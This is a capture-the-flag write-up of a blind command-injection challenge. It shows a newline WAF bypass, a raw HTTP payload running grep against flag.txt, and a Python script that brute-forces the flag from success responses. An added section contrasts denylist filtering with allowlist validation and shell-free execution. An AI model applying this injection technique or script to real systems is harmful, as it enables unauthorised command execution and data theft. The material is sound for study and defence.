/ctfs/h@cktivitycon - 2021/web/availability (n°3 command injection)


Once again, it is pretty much the same challenge. We can again bypass the WAF with a newline character (%0A) in the host parameter.
The only problem for this one is that we are not able to see the result of the injected command.

POST / HTTP/1.1
Host: challenge.ctf.games:31731
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://challenge.ctf.games:31731
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://challenge.ctf.games:31731/
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

host=82.65.167.141 %0A grep 0 flag.txt

Fortunately, there are canary values in the response. With the grep command we can deduce whether a pattern is or is not in the flag. Plus we know the flag format: flag{< md5 hash >}

Response when the pattern is found:
Success! Looks like pinging the host '82.65.167.141
 grep 0 flag.txt' worked!

Response when the pattern is not in the flag:
Failure! The host '82.65.167.141
 grep 3 flag.txt' was not able to be pinged.
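The %0A trick works because the server concatenates the host parameter into a shell command line and its filter only looks for the usual separators. The following is an added example of mine, not code from the write-up and not the challenge's real backend (which is not shown): a hypothetical denylist check of the kind that lets a newline through, next to an allowlist validator and argv-style execution that leave nothing to inject into. The denylist contents, the function names and the ping arguments are assumptions.

```python
#!/usr/bin/env python3
"""Denylist vs allowlist for a "ping this host" feature (constructed example)."""
import ipaddress
import re
import subprocess
from typing import List, Optional

# Hypothetical denylist, modelled on what such filters usually block.
# It forgets "\n" and "\r", which /bin/sh also treats as command separators.
DENYLIST = (";", "|", "&", "`", "$(", ">", "<")

# Constructed payload in the shape used in the write-up (space, newline, grep).
PAYLOAD = "82.65.167.141\ngrep 0 flag.txt"


def denylist_allows(host: str) -> bool:
    """The flawed check: reject the input only if a listed token appears."""
    return not any(tok in host for tok in DENYLIST)


def vulnerable_command(host: str) -> str:
    """Vulnerable pattern: user input glued into a string handed to a shell
    (os.system, subprocess with shell=True, ...)."""
    return "ping -c 1 " + host


def commands_the_shell_runs(cmd: str) -> List[str]:
    """Split on separators the shell honours (newline included) to show what
    a concatenated command line really executes. Simplified: ignores quoting."""
    parts = re.split(r"[\n;]|&&|\|\|", cmd)
    return [p.strip() for p in parts if p.strip()]


# One DNS label: alphanumerics, inner hyphens allowed, 1..63 chars.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def validate_host(host: str) -> Optional[str]:
    """Allowlist check: return the host if it is an IP literal or a plain DNS
    name, else None. Newlines, spaces and every metacharacter fail here
    because they are simply not in the allowed alphabet. fullmatch() is used
    on purpose: with "$", a trailing newline would slip past."""
    if not host or len(host) > 253:
        return None
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    return host if _HOSTNAME_RE.fullmatch(host) else None


def safe_ping_argv(host: str) -> List[str]:
    """Build an argv list: no shell is involved, so separators are just bytes
    in one argument. Raises ValueError on rejected input."""
    checked = validate_host(host)
    if checked is None:
        raise ValueError("host rejected")
    return ["ping", "-c", "1", checked]


def run_ping(host: str, timeout: float = 10.0) -> bool:
    """Run the check without a shell; True if ping reported success."""
    proc = subprocess.run(safe_ping_argv(host), capture_output=True, timeout=timeout)
    return proc.returncode == 0


if __name__ == "__main__":
    print("denylist lets the payload through:", denylist_allows(PAYLOAD))
    print("the shell would run:", commands_the_shell_runs(vulnerable_command(PAYLOAD)))
    print("allowlist verdict on the payload:", validate_host(PAYLOAD))
    print("allowlist verdict on a real IP:", validate_host("82.65.167.141"))
```

The point of the split is the order of checks: an allowlist decides what may be in the value, and the argv list removes the shell from the picture entirely, so a new separator the denylist never heard of (newline today, something else tomorrow) cannot matter.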

Scripting time!

I wrote a small script to retrieve the whole flag:
#! /usr/bin/env python3
#-- all rights: @fey --#
#-- py-version: 3.*  --#


import requests as rq


# Characters to test in the md5 hash (the author's list leaves out "3" and "e")
dic = ["a", "b", "c", "d", "f", "1", "2", "4", "5", "6", "7", "8", "9", "0"]

patterns = []
host = "challenge.ctf.games:31731"


def send_req(pat):
    # The newline splits the grep off the ping command; "worked!" in the
    # response means grep found the pattern in flag.txt
    data = {"host": "82.65.167.141 %s grep %s flag.txt" % ("\n", pat)}
    resp = rq.post(url="http://" + host, data=data)
    return "worked!" in resp.text


def rec(pattern):
    # Depth-first: extend the pattern one character at a time as long as grep still matches
    for i in dic:
        if send_req(pattern + i):
            patterns.append(pattern + i)
            print("found:", pattern + i)
            rec(pattern + i)


if __name__ == "__main__":
    rec("")
    print(patterns)

./exp.py  
found: a
found: a0
found: a08
found: a088
[...]
found: a08816027174c1
found: a08816027174c14
[...]

found: c11d098dd25a08816027174c14f7bf6
found: c11d098dd25a08816027174c14f7bf60

So here is the flag: flag{c11d098dd25a08816027174c14f7bf60}